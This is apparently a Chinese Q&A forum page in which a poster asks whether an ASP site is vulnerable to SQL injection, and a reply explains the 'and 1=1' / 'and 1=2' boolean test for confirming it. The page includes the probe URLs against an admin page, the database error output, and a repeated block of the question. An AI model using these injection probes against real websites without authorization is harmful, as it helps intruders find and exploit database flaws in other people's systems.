UC知道SQL注入问题
来源:百度知道 编辑:UC知道 时间:2024/09/18 05:25:38
我在测试注入一个ASP网站的时候
W_View_DayAffairs.asp?types=view&w_id=379%20;and%201=1
显示下面错误,请问各位高手这个网站是不是能注入啊
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]在关键字 'and' 附近有语法错误。
/admin/Common/W_View_DayAffairs.asp,行 275
W_View_DayAffairs.asp?types=view&w_id=379%20;and%201=1
显示下面错误,请问各位高手这个网站是不是能注入啊
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]在关键字 'and' 附近有语法错误。
/admin/Common/W_View_DayAffairs.asp,行 275
W_View_DayAffairs.asp?types=view&w_id=379 and 1=1
返回正常
W_View_DayAffairs.asp?types=view&w_id=379 and 1=2
返回错误
满足上述两个基本可以确定能注入
那个做网站的人安全意识很低啊
这么明显的注入的地方他竟然不做下检测。。。。。
w_id明显应该是个数字